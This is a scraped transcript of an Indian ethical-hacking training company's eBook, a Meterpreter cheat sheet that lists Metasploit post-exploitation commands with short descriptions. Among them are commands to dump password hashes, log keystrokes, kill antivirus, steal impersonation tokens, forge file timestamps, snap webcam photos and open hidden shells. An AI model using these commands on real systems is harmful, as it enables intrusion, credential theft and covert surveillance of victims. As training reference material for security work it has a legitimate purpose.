seculabs ebook - meterpreter cheatsheet commands
TRANSCRIPT
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 1/15
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 2/15
SECUGENIUS SECURITY SOLUTIONS
--------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile:
Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student
Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS
are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius
Security Solutions are providing training in Information Security and various professional courses.
Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters
Looking at the number of Cyber Crimes since last many years, We at Secugenius Security
Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank
Employees, Police officials.
Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the
benefit of the students & making them aware of the latest trends in technological era of the
Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the
nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime
Investigation & Forensic Sciences
Secugenius provides various security solutions to its clients by securing their websites from cyber
attacks. We provide training to college students, graduates and professionals in various fields.
Education is delivered to students through two modes i.e. Regular mode and Distance mode which
are available as short term and long term courses.
In the workshops conducted by Secugenius, participants can claim to be trained by the highly
experienced & skilled corporate trainers from different parts of the nation. We believe in making
the base of students to be as strong as possible. All the modules have been designed in order to
provide students with specialized knowledge by specialized trainers.
This library was furnished, managed and funded by the Founders and Directors of Secugenius
Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of
the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security
Solutions.
This Online Digital Library has been initiated as a free resource & permanent
resource on specialization basis for every student of Team Secugenius.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 3/15
Meterpreter Cheat sheet Commands
Product ID No: SG/ODL/13049
Founder & Director: Harpreet Khattar & Kshitij Adhlakha
Resource Person: Chetan Soni & Annuraj
Secugenius Security Solutions
SCO-13A, Model Town Extn, Near Krishna Mandir,
Ludhiana-141002, Punjab – India
[email protected], [email protected]
www.secugenius.com , www.seculabs.in
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 4/15
Meterpreter –
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLLinjection stagers and is extended over the network at runtime.
It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter was originally written by skape for Metasploit 2.x; a common extension wasmerged for 3.x and is currently undergoing an overhaul for Metasploit 3.3.
The server portion is implemented in plain C and is now compiled with MSVC, making itsomewhat portable. The client can be written in any language but Metasploit has a full-featured Ruby client API.
How Meterpreter Works
i. The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.
ii. The stager loads the DLL prefixed with Reflective. The Reflective stub handles the
loading/injection of the DLL.
iii. The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET.
Metasploit receives this GET and configures the client.
iv. Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module
gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV
protocol.(Reference - http://www.offensive-security.com )
Since the Meterpreter provides a whole new environment, we will cover some of thebasic Meterpreter commands to get you started and help you get familiar with this mostpowerful tool.
Throughout this EBook, almost every available Meterpreter command is covered.
For those that aren't covered, experimentation
is the key to successful learning.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 5/15
sysinfo
It shows the system build x86 or x64, language version, build...etc
run checkvm
It checks to see if the victim is running a Virtual Machine or native.
route
Dumps the routing table to the screen and shows how the subnet has beenconfigured...etc
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 6/15
run get_application_list
This shows you the applications installed on the remote PC.
idletime
It shows how long the victim has not been active on the computer.
getpid
This is to get the process ID and shows the process of which you are currentlyrunning off.
getuid
This will show you the system identity and show you who you are running assuch as system.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 7/15
ps
This shows all the processes running on the victim as well as the PID's.
getsystem
This gives you local system privileges.
run get_env
This will give you a lot of info on the system.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 8/15
execute -f cmd.exe -H – c
Open a command prompt on a hidden channel.
interact 1
Interact with a channel "1" will be replaced with the channel you want to interactwith.
Download
This command will download the specified command.
"Example" download c:\\boot.ini
upload
Upload files to the victim machine.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 9/15
portfwd
This command forwards a local port to a remote service.
run getgui – e
This will enable remote desktop on the victim.
run getcountermeasure
It checks the security configuration on the exploited machine and it can disablecountermeasures such as AV, firewalls, etc
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 10/15
run killav
It is designed to kill most AVs that are running as a service on the exploitedmachine.
run get_local_subnets
It is used to get the local subnet of the victim machine.
run remotewinenum
It is designed to enumerate the target system with the wmic command.
load
Load One or More Meterpreter Extensions.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 11/15
channel
Displays Info about Active Channels.
keyscan_start
Start Capturing Keystrokes
Getdesktop
setdesktop
Change the Meterpreters Current Desktop.
reboot
Reboots the Remote Computer.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 12/15
getprivs
Attempt to Enable All Privileges Available to the Current Pro
regInteract with the Remote Registry
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 13/15
shell
Drop into a system shell.
shutdown
Shuts Down the Remote Computer
steal_token
Attempt to Steal an Impersonation Token from the Process
execute
Execute a command.
infoDisplay info about active post module.
hashdump
Dumps the content of the SAM Database.
timestomp
Manipulates MACE Attributes
quit Terminate the meterpreter session.
getwd
Print Working Directory
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 14/15
webcam_list
List webcams.
webcam_snap
Take a snapshot from the specified webcam.
(Photo of Mr. Annuraj)
mkdir
Make directory.
7/29/2019 Seculabs eBook - Meterpreter Cheatsheet Commands
http://slidepdf.com/reader/full/seculabs-ebook-meterpreter-cheatsheet-commands 15/15
pwd
Print working directory.
drop_token
Relinquishes Any Active Impersonation Token
rmdir
Remove directory.
del
Delete file "example" del passwords.txt